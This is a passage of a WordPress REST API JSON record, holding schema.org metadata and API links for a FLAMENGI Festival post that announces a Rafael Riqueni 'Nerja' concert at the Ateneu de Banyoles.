Banyoles","datePublished":"2026-08-24T09:13:07+00:00","dateModified":"2026-09-02T11:19:26+00:00","mainEntityOfPage":{"@id":"https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/"},"wordCount":1700,"image":{"@id":"https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/#primaryimage"},"thumbnailUrl":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/2.-Manuel-Naranjo.jpg","articleSection":["Edici\u00f3 2026"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/","url":"https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/","name":"RAFAEL RIQUENI \u201cNERJA\u201d Diumenge 15 de novembre a les 18h a l'Ateneu de Banyoles - FLAMENGI FESTIVAL","isPartOf":{"@id":"https:\/\/flamengi.cat\/#website"},"primaryImageOfPage":{"@id":"https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/#primaryimage"},"image":{"@id":"https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/#primaryimage"},"thumbnailUrl":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/2.-Manuel-Naranjo.jpg","datePublished":"2026-08-24T09:13:07+00:00","dateModified":"2026-09-02T11:19:26+00:00","author":{"@id":"https:\/\/flamengi.cat\/#\/schema\/person\/99252030689047d68b309be665c89c41"},"breadcrumb":{"@id":"https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/#primaryimage","url":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/2.-Manuel-Naranjo.jpg","contentUrl":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/2.-Manuel-Naranjo.jpg","width":534,"height":800},{"@type":"BreadcrumbList","@id":"https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inici","item":"https:\/\/flamengi.cat\/"},{"@type":"ListItem","position":2,"name":"RAFAEL RIQUENI \u201cNERJA\u201d Diumenge 15 de novembre a les 18h a l&#8217;Ateneu de Banyoles"}]},{"@type":"WebSite","@id":"https:\/\/flamengi.cat\/#website","url":"https:\/\/flamengi.cat\/","name":"FLAMENGI FESTIVAL","description":"Festival Flamenc de Girona","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/flamengi.cat\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/flamengi.cat\/#\/schema\/person\/99252030689047d68b309be665c89c41","name":"Neoserveis","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g","caption":"Neoserveis"},"url":"https:\/\/flamengi.cat\/es\/author\/neoserveis\/"}]}},"_links":{"self":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts\/2861","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/comments?post=2861"}],"version-history":[{"count":6,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts\/2861\/revisions"}],"predecessor-version":[{"id":2999,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts\/2861\/revisions\/2999"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/media\/2865"}],"wp:attachment":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/media?parent=2861"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/categories?post=2861"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/tags?post=2861"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}